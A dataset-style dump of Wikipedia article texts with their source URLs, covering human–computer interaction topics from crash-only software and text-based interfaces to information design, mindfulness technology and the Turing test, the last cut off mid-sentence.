text
stringlengths
11
320k
source
stringlengths
26
161
Self-managementis the process by whichcomputersystems manage their own operation without human intervention. Self-management technologies are expected to pervade the next generation ofnetwork managementsystems.[citation needed] The growingcomplexityof modernnetworked computer systemsis a limiting factor in their expansion. The increasingheterogeneityof corporate computer systems, the inclusion ofmobile computingdevices, and the combination of different networking technologies likeWLAN,cellular phonenetworks, andmobile ad hoc networksmake the conventional, manual management difficult, time-consuming, and error-prone. More recently, self-management has been suggested as a solution to increasing complexity incloud computing.[1][2] An industrial initiative towards realizing self-management is theAutonomic ComputingInitiative (ACI) started byIBMin 2001. The ACI defines the following four functional areas:
https://en.wikipedia.org/wiki/Self-management_(computer_science)
Acrash-only softwareis acomputer programthat handle failures by simply restarting, without attempting any sophisticated recovery.[1]Correctly written components of crash-only software canmicrorebootto a known-good state without the help of a user. Since failure-handling and normal startup use the same methods, this can increase the chance that bugs in failure-handling code will be noticed,[clarification needed]except when there are leftover artifacts, such asdata corruptionfrom a severe failure, that don't occur during normal startup.[citation needed] Crash-only software also has benefits for end-users. All too often, applications do not save their data and settings while running, only at the end of their use. For example,word processorsusually save settings when they are closed. A crash-only application is designed to save all changed user settings soon after they are changed, so that thepersistent statematches that of the running machine. No matter how an application terminates (be it a clean close or the sudden failure of a laptop battery), the state will persist. Thissoftware-engineering-related article is astub. You can help Wikipedia byexpanding it.
https://en.wikipedia.org/wiki/Crash-only_software
Digital Live Art[1]is the intersection ofLive Art (art form),ComputingandHuman Computer Interaction(HCI). It is used to describe live performance which is computer mediated - an orchestrated, temporal witnessed event occurring for any length of time and in any place using technological means. Digital Live Art borrows the methods, tools and theories from HCI to help inform and analyze the design and evaluation of Digital Live Art experiences. Central to the understanding of Digital Live Art is the concept of performanceframing (social sciences). First identified byGregory Bateson,[2]the performance frame is described as a cognitive context where all the rules of behavior, symbols, and their interpretations are bound within a particular activity within its own structure. The concept has since been used extensively in ethnography byErving Goffmanin his discussions of face to face encounters in the everyday, in discourse structures;[3]in theatrical and ritual events;[4][5]sporting events and festivals;[6]and trance phenomena[7](see:[8]). Goffman's work uses the concept of performance frame to broadly mean a constructed context within the limits of which individual human agency and social interaction takes place. For example, a theatrical frame,[9]pp. 124–155) involves the construction of a higher-level frame on top of a ‘primary framework’, i.e., the reality in which the fantasy takes place. In this example, actors assume a character, audiences suspend disbelief and events have their meaning transformed (e.g., compare the use of a mobile phone in public with its use in a theatre). Additionally, framings are temporal, meaning that they have specific beginning and endings. While many theorists argue that all social interaction may be seen from a dramaturgical perspective, meaning all everyday social interaction becomes performance in some sense,[9]Digital Live Art theorists often deliberately align their work withRichard Schechner,[10]narrowing their analysis to cover more stabilized ‘established’ forms of performance so that performance framing is defined as an activity done within the intended frame ‘by an individual or group’ who have some established knowledge about the frame, and are ‘in the presence of and for another individual or group’.[11]Performance framings then, are intentional, temporal and for an audience. The goal of interaction in Digital Live Art goes beyond that of traditional HCI methods and theory which focus on usability, functionality and efficiency. HCI andCSCWmodels often focus on workplace activities and their tasks, artefacts and goals. This research often leads to a better understanding of how to increase efficiency in the workplace by providing more efficient and usable interfaces. For example, one could conductusability testingortask analysisof how a DJ uses his DJ decks and one could then use this information to design a more efficient system. However, traditional HCI models tell us little about how the performer-audience relationship develops as a result of users wittingness to interact with the system. The intention with Digital Live Art is not to make more "usable" systems but rather to allow for "participatory transitions"[1]- transitions between "witting and unwitting",[1]between observation and participation, between participation and performance. Since the goal with Digital Live Art systems is to "mediate wittingness"[1]rather than task-focused interaction, the application of many HCI models, frameworks and methods become insufficient for analyzing and evaluating Digital Live Art. Sheridan first introduced thePerformance Triad Model[12]for analyzing "tripartite interaction" - interaction between observers, participants and performers. In the Performance Triad Model, tripartite interaction where technology binds tripartite interaction to context and environment. Reeves et al.[13]draws a distinction between a performer and a spectator and how their transitioning relationship as mediated by the interface. Dix and Sheridan[14]introduced aformal methodfor analyzing "performative interaction"[1]in Digital Live Art. This formal method provides a mathematical technique for deconstructing interaction between witting and unwitting bystanders and observers, participants in the performance and the performers themselves. The work attempts to formalise some of the basic attributes of performative interaction against a background of sociological analysis in order to better understand how computer interfaces may support performance. This work shows how this generic formalisation can be used in the deconstruction, analysis and understanding of performative action and more broadly in live performance.
https://en.wikipedia.org/wiki/Digital_Live_Art
Incomputing,text-based user interfaces(TUI) (alternatelyterminal user interfaces, to reflect a dependence upon the properties ofcomputer terminalsand not just text), is aretronymdescribing a type ofuser interface(UI) common as an early form ofhuman–computer interaction, before the advent of bitmapped displays and modern conventionalgraphical user interfaces(GUIs). Like modern GUIs, they can use the entirescreenarea and may acceptmouseand other inputs. They may also use color and often structure the display usingbox-drawing characterssuch as ┌ and ╣. The modern context of use is usually aterminal emulator. Fromtext application's point of view, a text screen (and communications with it) can belong to one of three types (here ordered in order of decreasing accessibility): UnderLinuxand otherUnix-likesystems, a program easilyaccommodatesto any of the three cases because the same interface (namely,standard streams) controls the display and keyboard. Seebelowfor comparison to Windows. ManyTUI programming librariesare available to help developers buildTUI applications. American National Standards Institute(ANSI) standardANSI X3.64defines a standard set ofescape sequencesthat can be used to drive terminals to create TUIs (seeANSI escape code). Escape sequences may be supported for all three cases mentioned in the above section, allowing arbitrarycursormovements and color changes. However, not all terminals follow this standard, and many non-compatible but functionally equivalent sequences exist. OnIBM Personal Computersandcompatibles, the Basic Input Output System (BIOS) andDOSsystem calls provide a way to write text on the screen, and theANSI.SYSdriver could process standard ANSI escape sequences. However, programmers soon learned that writing data directly to thescreen bufferwas far faster and simpler to program, and less error-prone; seeVGA-compatible text modefor details. This change in programming methods resulted in many DOS TUI programs.TheWindows consoleenvironment is notorious for its emulation of certain EGA/VGA text mode features, particularly random access to the text buffer, even if the application runs in a window. On the other hand, programs running under Windows (both native and DOS applications) have much less control of the display and keyboard than Linux and DOS programs can have, because of aforementioned Windows console layer. Most often those programs used a blue background for the main screen, with white or yellow characters, although commonly they had also user color customization. They often usedbox-drawing charactersin IBM'scode page 437. Later, the interface became deeply influenced bygraphical user interfaces(GUI), addingpull-down menus, overlappingwindows,dialog boxesandGUI widgetsoperated bymnemonicsorkeyboard shortcuts. Soonmouseinput was added – either at text resolution as a simple colored box or at graphical resolution thanks to the ability of theEnhanced Graphics Adapter(EGA) andVideo Graphics Array(VGA) display adapters toredefine the text character shapes by software– providing additional functions. Some notable programs of this kind wereMicrosoft Word,DOS Shell,WordPerfect,Norton Commander,Turbo VisionbasedBorlandTurbo PascalandTurbo C(the latter included theconiolibrary),Lotus 1-2-3and many others. Some of these interfaces survived even during theMicrosoftWindows 3.1xperiod in the early 1990s. For example, theMicrosoft C6.0 compiler, used to write true GUI programs under16-bitWindows, still has its own TUI. Since its start,Microsoft Windowsincludes a console to display DOS software. Later versions added theWindows consoleas a native interface forcommand-line interfaceand TUI programs. The console usually opens in window mode, but it can be switched to full, true text mode screen and vice versa by pressing theAltandEnterkeys together. Full-screen mode is not available in Windows Vista and later, but may be used with some workarounds.[1] Windows Terminalis amulti-tabbedterminal emulatorthatMicrosofthas developed forWindows 10and later[2]as a replacement forWindows Console. TheWindows Subsystem for Linuxwhich was added to Windows byMicrosoftin 2019, supports runningLinuxtext-based apps on Windows, withinWindows console,Windows Terminal, and other Windows-based terminals. InUnix-likeoperating systems, TUIs are often constructed using the terminal controllibrarycurses, orncurses(a mostly compatible library), or the alternativeS-Langlibrary. The advent of thecurseslibrary withBerkeley Unixcreated a portable and stable API for which to write TUIs. The ability to talk to varioustext terminaltypes using the sameinterfacesled to more widespread use of "visual" Unix programs, which occupied the entire terminal screen instead of using a simple line interface. This can be seen intext editorssuch asvi,mail clientssuch aspineormutt, system management tools such asSMIT,SAM,FreeBSD'sSysinstallandweb browserssuch aslynx. Some applications, such asw3m, and older versions of pine andviuse the less-abletermcaplibrary, performing many of the functions associated withcurseswithin the application. Custom TUI applications based onwidgetscan be easily developed using thedialogprogram (based onncurses), or theWhiptailprogram (based onS-Lang). In addition, the rise in popularity ofLinuxbrought many former DOS users to a Unix-like platform, which has fostered a DOS influence in many TUIs. The programminicom, for example, is modeled after the popular DOS programTelix. Some other TUI programs, such as theTwindesktop, wereportedover. Most Unix-like operating systems (Linux, FreeBSD, etc.) supportvirtual consoles, typically accessed through a Ctrl-Alt-F key combination. For example, under Linux up to 64 consoles may be accessed (12 via function keys), each displaying in full-screen text mode. Thefree softwareprogramGNU Screenprovides for managing multiple sessions inside a single TUI, and so can be thought of as being like awindow managerfor text-mode and command-line interfaces.Tmuxcan also do this. The proprietarymacOStext editorBBEditincludes ashell worksheetfunction that works as a full-screen shell window. ThefreeEmacstext editor can run a shell inside of one of its buffers to provide similar functionality. There are several shell implementations in Emacs, but onlyansi-termis suitable for running TUI programs. The other common shell modes,shellandeshellonly emulate command lines and TUI programs will complain "Terminal is not fully functional" or display a garbled interface. ThefreeVimandNeovimtext editors have terminal windows (simulatingxterm). The feature is intended for running jobs, parallel builds, or tests, but can also be used (with window splits and tab pages) as a lightweight terminal multiplexer. VAX/VMS (later known asOpenVMS) had a similar facility tocursesknown as the Screen Management facility or SMG. This could be invoked from the command line or called from programs using the SMG$ library.[3] Another kind of TUI is the primary interface of theOberon operating system, first released in 1988 and still maintained. Unlike most other text-based user interfaces, Oberon does not use a text-mode console or terminal, but requires a large bit-mapped display, on which text is the primary target for mouse clicks. Analogous to alinkinhypertext, a command has the formatModule.Procedureparameters~and is activated with a mouse middle-click. Text displayed anywhere on the screen can be edited, and if formatted with the required command syntax, can be middle-clicked and executed. Any text file containing suitably-formatted commands can be used as a so-calledtool text, thus serving as a user-configurable menu. Even the output of a previous command can be edited and used as a new command. This approach is radically different from both conventional dialogue-oriented console menus orcommand-line interfacesbut bears some similarities to the worksheet interface of theMacintosh Programmer's Workshop.[citation needed] Since it does not use graphicalwidgets, only plain text, but offers comparable functionality to aGUIwith atiling window manager, it is referred to as a Text User Interface or TUI. For a short introduction, see the 2nd paragraph on page four of the first publishedReport on the Oberon System.[4] Oberon'sUIinfluenced the design of theAcme text editor and email clientfor thePlan 9 from Bell Labsoperating system. Modernembedded systemsare capable of displaying TUI on a monitor like personal computers. This functionality is usually implemented using specialized integrated circuits, modules, or usingFPGA. Video circuits or modules are usually controlled usingVT100-compatible command set overUART,[citation needed]FPGA designs usually allow direct video memory access.[citation needed]
https://en.wikipedia.org/wiki/Text-based_user_interface
TheHCI Bibliographyis a web-based project to provide abibliographyofHuman Computer Interaction(HCI) literature. The goal of the Project isto put an electronic bibliography for most of HCI on the screens of all researchers, developers, educators and students in the field through the World-Wide Web and anonymous ftp access. The HCI Bibliography Project is an effort aiming at giving free of charge access to all information seekers searching for bibliographic information in the field of HCI. This is a database, accessible from anywhere in the world. The HCI bibliographic project was inspired by Gary Perlman (director of the HCI Bibliography project) in 1998. Initially, the project was struggling to find funding and sponsors, but fortunately study-work students atOhio State Universitywere available to perform the task of entering the bibliographic data into the database. Some people from the internet were willing to help with the task of verifying the data. Donation from publishers also played a role in the building of the database. While there were less funding and sponsors at the beginning of the project, publishers gave the HCI Bibliography team permission to put their materials online for free of charge.[1] As of September 2024, the site is no longer accepting updates, and this policy probably was established in 2016. In 2007, the HCI Bibliography group acknowledges several publishers for their support of the project. Project support included publishers giving copyright permission and donation of publications to be entered into the HCI Bibliography database.[2] As of July 2009, the HCI Bibliography has over 50,000 entries.[3]These entries are made up of Journal volumes, Conference Proceeding, Books and some special files.
https://en.wikipedia.org/wiki/HCI_Bibliography
Information architecture(IA) is the structural design of sharedinformationenvironments; theartandscienceof organizing and labellingwebsites,intranets,online communitiesandsoftwareto support usability and findability; and an emergingcommunity of practicefocused on bringing principles ofdesign,architectureandinformation scienceto the digital landscape.[1]Typically, it involves amodelorconceptofinformationthat is used and applied to activities which require explicit details of complexinformation systems. These activities includelibrarysystems anddatabasedevelopment. Information architecturehas somewhat different meanings in different branches ofinformation systemsorinformation technology: The difficulty in establishing a common definition for "information architecture" arises partly from the term's existence in multiple fields. In the field ofsystems design, for example, information architecture is a component ofenterprise architecturethat deals with the information component when describing the structure of an enterprise. While the definition of information architecture is relatively well-established in the field of systems design, it is much more debatable within the context of online information (i.e., websites). Andrew Dillon refers to the latter as the "big IA–little IA debate".[7]In the little IA view, information architecture is essentially the application ofinformation sciencetoweb designwhich considers, for example, issues of classification and information retrieval. In the big IA view, information architecture involves more than just the organization of a website; it also factors inuser experience, thereby consideringusabilityissues ofinformation design.
https://en.wikipedia.org/wiki/Information_architecture
Information designis the practice of presenting information in a way that fosters an efficient and effective understanding of the information. The term has come to be used for a specific area ofgraphic designrelated to displaying information effectively, rather than just attractively or for artistic expression. Information design is closely related to the field ofdata visualizationand is often taught as part of graphic design courses.[1]The broad applications of information design along with its close connections to other fields ofdesignand communication practices have created some overlap in the definitions ofcommunication design,data visualization, andinformation architecture. According toPer Mollerup, information design is explanation design. It explains facts of the universe and leads to knowledge and informed action.[2] The term 'information design' emerged as amultidisciplinaryarea of study in the 1970s. Use of the term is said to have started with graphic designers and it was solidified with the publication of theInformation Design Journalin 1979. Later, the related International Institute for Information Design (IIID) was set up in 1987 andInformation Design Association(IDA) established in 1991.[3]In 1982,Edward Tufteproduced a book on information design calledThe Visual Display of Quantitative Information. The terminformation graphicstends to be used by those primarily concerned with diagramming and display of quantitative information, such as technical communicators and graphic designers. Intechnical communication, information design refers to creating an information structure for a set of information aimed at specified audiences. It can be practised on different scales. There are many similarities between information design and information architecture. The title of information designer is sometimes used by graphic designers who specialize in creating websites. The skillset of the information designer, as the title is applied more globally, is closer to that of theinformation architectin the U.S. Similar skills for organization and structure are brought to bear in designing web sites and digital media, with additional constraints and functions that earn a designer the title information architect. Incomputer scienceandinformation technology, 'information design' is sometimes a rough synonym for (but is not necessarily the same discipline as)information architecture, the design ofinformation systems,databases, ordata structures. This sense includesdata modelingandprocess analysis. Information design is associated with the age of technology but it does have historical roots. Early instances of modern information design include these effective examples: The Minard diagram shows the losses suffered by Napoleon's army in the 1812–1813 period. Six variables are plotted: the size of the army, its location on a two-dimensional surface (x and y), time, direction of movement, and temperature. This multivariate display on a two-dimensional surface tells a story that can be grasped immediately while identifying the source data to build credibility.Edward Tuftewrote in 1983 that: "It may well be the best statistical graphic ever drawn."[5] Information design can be used for broad audiences (such as signs in airports) or specific audiences (such as personalized telephone bills).[11]The resulting work often seeks to improve a user's trust of a product (such as medicine packaging inserts, operational instructions for industrial machinery and information for emergencies). The example of signs also highlights a niche category known aswayfinding. Governments and regulatory authorities have legislated about a number of information design issues, such as the minimum size of type in financial small print, the labelling of ingredients in processed food, and the testing of medicine labelling. Examples of this are theTruth in Lending Actin the USA, which introduced theSchumer box(a concise summary of charges for people applying for a credit card), and the Guideline on the Readability of the Labelling and Package Leaflet of Medicinal Products for Human Use (European Commission, Revision 1, 12 January 2009). ProfessorEdward Tufteexplained that users of information displays are executing particularanalytical taskssuch as making comparisons or determining causality. Thedesign principleof the information graphic should support the analytical task, showing the comparison or causality.[12] Simplicity is a major concern in information design. The aim is clarity and understanding. Simplification of messages may imply quantitative reduction but is not restricted to that. Sometimes more information means more clarity. Also, simplicity is a highly subjective matter and should always be evaluated with the information user in mind. Simplicity can be easy when following five simple steps when it comes to information design: These steps will help an information designer narrow down results, as well as keeping their audience engaged.[13]
https://en.wikipedia.org/wiki/Information_design
Mindfulness and technologyis a movement in research and design, that encourages the user to become aware of the present moment, rather than losing oneself in a technological device. This field encompasses multidisciplinary participation between design, psychology, computer science, and religion.Mindfulnessstems from Buddhistmeditationpractices and refers to the awareness that arises through paying attention on purpose in the present moment, and in a non-judgmental mindset. In the field ofHuman-Computer Interaction, research is being done onTechno-spirituality— the study of how technology can facilitate feelings of awe, wonder, transcendence, and mindfulness[1]and onSlow design,[2][3]which facilitatesself-reflection. The excessive use of personal devices, such as smartphones and laptops, can lead to the deterioration of mental and physical health.[4]This area focuses on redesigning and creating technology to improve the wellbeing of its users. In 1979,Jon Kabat-Zinnfounded theMindfulness-Based Stress Reduction(MBSR) program at the University of Massachusetts to treat the chronically ill.[5]He is noted[by whom?]to be responsible for the popularization of mindfulness in Western culture. The program uses a combination of mindfulness meditation,body awareness, andyoga. These practices derived from teachings of theEastern World, specifically Buddhist traditions. Researchers found that enhanced mindfulness through the program partly mediated the association[which?]between increased daily spiritual experiences and improved mental-health-related quality of life.[6][need quotation to verify] Early studies of mindfulness focused on health issues related to psychosomatic and psychiatric disorders,[7]while later studies of mindfulness explore thebusiness sector, showing an increase increativityand a decrease in burnout.[8]Studies on the relationship between mindfulness and technology are fairly new, with some of the more recent research highlighting the importance the practice plays in safety.[8] Neurofeedback, also known as EEG biofeedback, is a non-invasive technique that uses real-time displays of brain activity to teach self-regulation of brain function. It involves placing sensors on the scalp to monitor brainwave patterns, which are then displayed on a computer screen. This real-time feedback facilitates operant conditioning, enhancing mindfulness and meditation practices. Research has shown that combining neurofeedback with mindfulness practices can significantly enhance the benefits of both approaches. Neurofeedback helps individuals maintain optimal brainwave patterns during mindfulness exercises, improving their ability to achieve and sustain a state of non-judgmental awareness. This combination has been associated with improved emotional regulation, reduced stress, and better cognitive function.[9] Studies have also investigated the use of neurofeedback-augmented mindfulness training (NAMT) in clinical settings. For instance, a randomized controlled trial is examining the effectiveness of real-time fMRI neurofeedback combined with mindfulness practice for adolescents with major depressive disorder (MDD). This study aims to determine the optimal duration and dosing of these interventions to maximize their therapeutic effects.[10] Various desktop and mobile applications aid users in practicing mindfulness, includingCalm,Headspace, Insight Timer, Buddhify, and Yours App. Research supports the efficacy of these applications. A randomized controlled trial demonstrated that using a mindfulness meditation app can alleviate acute stress and improve mood, potentially offering long-term benefits for attentional control.[11] Additionally, studies have shown that meditation can change brain activity and reduce emotional reactivity. A 2012 study published in *Frontiers in Human Neuroscience* found that Mindful Attention training can down-regulate emotional reactivity, with changes in brain activity persisting in everyday life, not just during meditation.[12]Furthermore, a 2011 brain imaging study published in the *Journal of Neuroscience* found that even brief mindfulness meditation instruction (four 20-minute sessions) effectively relieved pain by reducing the brain's emotional response to painful stimuli.[13] To help make meditation and mindfulness more accessible, developers have created digital health platforms such as Am Mindfulness, Headspace, Insight Timer, and Buddhify. Notably, Am Mindfulness is the only commercially available meditation app that has outperformed placebos in randomized controlled trials.[11] According to Vietnamese Zen teacherThich Nhat Hanh, the ringing of a bell every 15 minutes[14]is an effective way to cultivate the mindfulness practice and connect back with the body. The Mindfulness Bell and Mindful Mynah applications simulate the bell on the user's personal device. There are several wearables which measures the breath in order to connect the user back to their body. Wo.Defy is a dress which attempts to reveal the beauty of emotional communication using the common platform of the human breath; proposing the best methods of human to human communication lie within us.[15]Spiremeasures your breathing patterns to give you insights into your state of mind.[16]Being, the mindfulness tracker from Zensorium, maps user's emotions (stressed, excited normal and calm) through heart rate variability.[17]WellBe monitors heart rate levels and then matches them, through a patent pending algorithm, to specific moments and interactions throughout a user's day.[17]SmartMat is a responsive mat embedded with 21,000 sensors to detect your body's balance, pressure and alignment.[17]Prana's platform evaluates breath patterns, takes into account the effects of posture on breathing, and differentiates between diaphragmatic and chest breathing, three critical components of assessing the true quality of breathing, previously unaddressed by systems such as spirometers or pulse oximeters.[18] Sonic Cradle enables users to shape sound with their breath while suspended in a completely dark chamber.[19]The researchers conducted a qualitative study with 39 participants to show how persuasive media has the potential to promote long-term psychological health by experientially introducing a stress-relieving, contemplative practice to non-practitioners.[19] Because the nature of chronic pain is complex, pharmacological analgesics are often not enough to achieve an ideal treatment plan. The system incorporates biofeedback sensors, an immersive virtual environment, and stereoscopic sound titled the "Virtual Meditative Walk" (VMW). It was designed to enable chronic pain patients to learn Mindfulness-based stress reduction (MBSR), a form of meditation. By providing real-time visual and sonic feedback, VMW enables patients to learn how to manage their pain.[20] Intel anthropologist Genevieve Bell has urged the human-computer interaction (HCI) research community to devote more research to the use of technology in spirituality and religion. Techno-spirituality is the study of how technology can facilitate feelings of awe, wonder, transcendence, and mindfulness.[1]Currently, there are 6,000 applications related to spirituality and religion. This area is in high demand and “important under-explored areas of HCI research”.[21] Inspired by Bell's work, researchers (Sterling & Zimmerman) focused on how mobile phones could be incorporated in American Soto Zen Buddhist community, without conflicting with their philosophy of “the here and the now”. They were able to find three ways to use technology to help strengthen ties within the community.[22] Slow designis a design agenda for technology aimed at reflection and moments of mental rest rather than efficiency in performance.[2] Mindful design, based onLanger’s theory of mindfulness,[23][24]is a design philosophy that incorporates the idea of mindfulness into creating meaningful user oriented design. A major tenant is the behavior change of a user through awareness and responsibility of meaningful interactions between user and designed object, and this will encourage more desirable human practices.[25]This type of mind behavior driven change has been most heavily incorporated design for sustainability. Other approaches include crime prevention or health. It is also seen in the design of safety objects and the social interaction of performative objects. Performative objects are identified as design objects that are designed to facilitate mindful awareness of the physical and symbolic social actions and their consequences within which they are used.[26] Several major tech companies in Silicon Valley have incorporated mindfulness practices into their workplace culture. For example,Googleoffers bimonthly "mindfulness lunches" and has constructed a labyrinth for walking meditations. Similarly,TwitterandFacebookhave integrated contemplative practices into their employee programs. These initiatives aim to enhance communication and develop theemotional intelligenceof employees.[27] Mindfulness is currently being explored by researchers as a possible treatment for technological addiction, also known asInternet addiction disorder, a form ofbehavioral addiction. There has been some consensus in the field of psychology on the benefits of using mindfulness to treat behavioral addiction.[28]Experts in the field say in order to treat technology addiction with mindfulness, one must be non-judgmental about the behavior and pay attention in order to recognize instances in which technology is being used mindlessly. Then reflect on the helpfulness of the device, and notice the benefits of disconnecting.[29]The three keystones of mindfulness are: Intention, Attention and Action.[29]Technology is said to interfere with mindfulness by causing the individual to forget what matters (intention), the distracts (attention), and then keeps the individual from taking action.[29] In technological addiction, the reward system, located in themid-brainand underlies addiction, evolved to rewards finding and consuming food. In complex animals this evolution also rewards the exchange of information within the social group. In humans this has developed into its current form of mass worldwide communication.[30]The exchange of social information has demonstrated reward based reinforcement, similar to that ofgamification.[30] Critics argue that mindfulness in technology can lead to technophobia, pacification of workplace grievances, and disconnection from religious roots. Some view the movement as a marketing tactic rather than a genuine solution to technological overuse. Others are concerned about the secularization of mindfulness, fearing it may dilute its traditional Buddhist values. Mobile meditation applications likeCalm,HeadspaceandMyLifehave over a million users and are increasing in popularity. Swedish Researchers found that downloading and using the applications for eight weeks made little to no difference for people with major depression and anxiety. They did, however, see improvements with a subgroup with mild levels of depression.[31]Mindfulness apps are also associated with a range of challenges to engagement.[32] Criticisms of the slow technology movement are similar to the slow-food movement; it lacks understanding of global scope, and as an individualistic response will not answer the actual problems in technology. This movement has been dubbed by critics as disconnectionists.[33]Mindfulness in technology has been criticized as being less about restoring self and more about stifling autonomy that technology inspires. Anti-disconnectionists state mindfulness and the expressed need to disconnect from technology and the modern world can be accused of being a nostalgia-manipulating marketing tactic and maybe a technological form ofconservatism. Critics state that the labeling of digital connection as debasing and unnatural is in direct proportion to the rapidity of adoption.[33][34]Thus it is depicted as a dangerous desire and toxin to be regulated. This argument itself can be tied back torationalization,Walter Benjaminon aura,Jacques Ellulon technique,Jean Baudrillardon simulations, orZygmunt Baumanand the Frankfurt School on modernity and the Enlightenment. Critics state that disconnectionists see the Internet as having normalized or enforced a repression of an authentic self in favor of a social media avatar.[33]Thus reflecting the desire to connect with a deeper self, which may itself be an illusion. The pathologization of technology use then opens the door forFoucault's idea of "normalization" to be applied to technology in similar fashion as other social ills, which then can become a concept around which social control and management can be applied. There is some concern among Buddhist practitioners that decoupling meditation and mindfulness from the core tenement ofBuddhismmay have negative effects. The wide adoption of mindfulness in technology and the tech industry has been accused of increasing passivity in the worker by creating a calm mindstate which then allows for disconnection from actual grievances.[35]Critics of mindfulness inCognitive Behavior Therapyalso comment on this as a possible problem.[33]However, critics of the movement, such as Ronald Purser, fear that the secularization of mindfulness, dubbedMcMindfulness,[36]leads to reinforcement of anti-Buddhist ideas. Buddhists differentiate betweenRight Mindfulness(samma sati) andWrong Mindfulness(miccha sati). The distinction is not moralistic: the issue is whether the quality of awareness is characterized by wholesome intentions and positive mental qualities that lead to human flourishing and optimal well-being for others as well as oneself. Mindfulness as adopted by the Silicon Valley tech giants has been criticized as conveniently shifting the burden of stress and toxic work environment onto the individual employee. Obfuscated by the seemingly inherent qualities of care and humanity, mindfulness is refashioned into a way of coping with and adapting to the stresses and strains of corporate life rather than actually solving them.[36]
https://en.wikipedia.org/wiki/Mindfulness_and_technology
The following outline is provided as an overview of and topical guide to human–computer interaction: Human–Computer Interaction (HCI)– the intersection of computer science and behavioral sciences — this field involves the study, planning, and design of the interaction between people (users) and computers. Attention to human-machine interaction is important, because poorly designed human-machine interfaces can lead to many unexpected problems. A classic example of this is theThree Mile Island accidentwhere investigations concluded that the design of the human-machine interface was at least partially responsible for the disaster. Human–Computer Interaction can be described as all of the following: Human–computer interaction draws from the following fields: History of human–computer interaction Hardwareinput/outputdevices andperipherals: Motion pictures featuring interesting user interfaces: Industrial labs and companies known for innovation and research in HCI:
https://en.wikipedia.org/wiki/Outline_of_human%E2%80%93computer_interaction
TheTuring test, originally called theimitation gamebyAlan Turingin 1949,[2]is a test of a machine's ability toexhibit intelligent behaviourequivalent to that of a human. In the test, a human evaluator judges a text transcript of anatural-languageconversation between a human and a machine. The evaluator tries to identify the machine, and the machine passes if the evaluator cannot reliably tell them apart. The results would not depend on the machine's ability toanswer questions correctly, only on how closely its answers resembled those of a human. Since the Turing test is a test of indistinguishability in performance capacity, the verbal version generalizes naturally to all of human performance capacity, verbal as well as nonverbal (robotic).[3] The test was introduced by Turing in his 1950 paper "Computing Machinery and Intelligence" while working at theUniversity of Manchester.[4]It opens with the words: "I propose to consider the question, 'Can machines think?'" Because "thinking" is difficult to define, Turing chooses to "replace the question by another, which is closely related to it and is expressed in relatively unambiguous words".[5]Turing describes the new form of the problem in terms of a three-personparty gamecalled the "imitation game", in which an interrogator asks questions of a man and a woman in another room in order to determine the correct sex of the two players. Turing's new question is: "Are there imaginable digital computers which would do well in theimitation game?"[2]This question, Turing believed, was one that could actually be answered. In the remainder of the paper, he argued against the major objections to the proposition that "machines can think".[6] Since Turing introduced his test, it has been highly influential in thephilosophy of artificial intelligence, resulting in substantial discussion and controversy, as well as criticism from philosophers likeJohn Searle, who argue against the test's ability to detectconsciousness.[7][8] Since the mid2020s, severallarge language modelssuch asChatGPThave passed modern, rigorous variants of the Turing test.[9][10][11] Several earlysymbolic AI programswere controversially claimed to pass the Turing test, either by limiting themselves to scripted situations or by presenting "excuses" for poor reasoning and conversational abilities, such asmental illnessor a poor grasp of English.[12][13][14] In 1966,Joseph Weizenbaumcreated a program calledELIZA, which mimicked aRogerian psychotherapist. The program would search the user's sentence for keywords beforerepeating them back to the user, providing the impression of a program listening and paying attention.[15]Weizenbaum thus succeeded by designing a context where a chatbot could mimic a person despite "knowing almost nothing of the real world".[13]Weizenbaum's program was able to fool some people into believing that they were talking to a real person.[13] Kenneth ColbycreatedPARRYin 1972, a program modeled after the behaviour ofparanoid schizophrenics.[16]Psychiatrists asked to compare transcripts of conversations generated by the program to those of conversations by actual schizophrenics could only identify about 52 percent of cases correctly (a figure consistent with random guessing).[17] In 2001, three programmers developedEugene Goostman, a chatbot portraying itself as a 13-year-old boy fromOdesawho spokeEnglish as a second language. This background was intentionally chosen so judges would forgive mistakes by the program. In a competition, 33% of judges thought Goostman was human.[18][19][20] In June 2022,Google'sLaMDAmodel received widespread coverage after claims about it having achieved sentience. Initially in an article inThe EconomistGoogle Research Fellow Blaise Agüera y Arcas said the chatbot had demonstrated a degree of understanding of social relationships.[21]Several days later, Google engineer Blake Lemoine claimed in an interview with theWashington Postthat LaMDA had achieved sentience. Lemoine had been placed on leave by Google for internal assertions to this effect. Google had investigated the claims but dismissed them.[22][23] OpenAI's chatbot, ChatGPT, released in November 2022, is based onGPT-3.5andGPT-4large language models. Celeste Biever wrote in aNaturearticle that "ChatGPT broke the Turing test".[24]Stanford researchers reported that ChatGPT passes the test; they found that ChatGPT-4 "passes a rigorous Turing test, diverging from average human behavior chiefly to be more cooperative",[9]making it the first computer program to successfully do so.[10] In late March 2025, a study evaluated four systems (ELIZA, GPT-4o, LLaMa-3.1-405B, and GPT-4.5) in two randomized, controlled, and pre-registered Turing tests with independent participant groups. Participants engaged in simultaneous 5-minute conversations with another human participant and one of these systems, then judged which conversational partner they believed to be human. When instructed to adopt a humanlike persona, GPT-4.5 was identified as the human 73% of the time—significantly more often than the actual human participants. LLaMa-3.1, under the same conditions, was judged to be human 56% of the time, not significantly more or less often than the humans they were compared to. Baseline models (ELIZA and GPT-4o) achieved win rates significantly below chance (23% and 21%, respectively). These results provide the first empirical evidence that any artificial system passes a standard three-party Turing test. The findings have implications for debates about the nature of intelligence exhibited by Large Language Models (LLMs) and the social and economic impacts these systems are likely to have.[11] The question of whether it is possible for machines to think has a long history, which is firmly entrenched in the distinction betweendualistandmaterialistviews of the mind.René Descartesprefigures aspects of the Turing test in his 1637Discourse on the Methodwhen he writes: [H]ow many different automata or moving machines could be made by the industry of man ... For we can easily understand a machine's being constituted so that it can utter words, and even emit some responses to action on it of a corporeal kind, which brings about a change in its organs; for instance, if touched in a particular part it may ask what we wish to say to it; if in another part it may exclaim that it is being hurt, and so on. But it never happens that it arranges its speech in various ways, in order to reply appropriately to everything that may be said in its presence, as even the lowest type of man can do.[25] Here Descartes notes thatautomataare capable of responding to human interactions but argues that such automata cannot respond appropriately to things said in their presence in the way that any human can. Descartes therefore prefigures the Turing test by defining the insufficiency of appropriate linguistic response as that which separates the human from the automaton. Descartes fails to consider the possibility that future automata might be able to overcome such insufficiency, and so does not propose the Turing test as such, even if he prefigures its conceptual framework and criterion. Denis Diderotformulates in his 1746 bookPensées philosophiquesa Turing-test criterion, though with the important implicit limiting assumption maintained, of the participants being natural living beings, rather than considering created artifacts: If they find a parrot who could answer to everything, I would claim it to be an intelligent being without hesitation. This does not mean he agrees with this, but that it was already a common argument 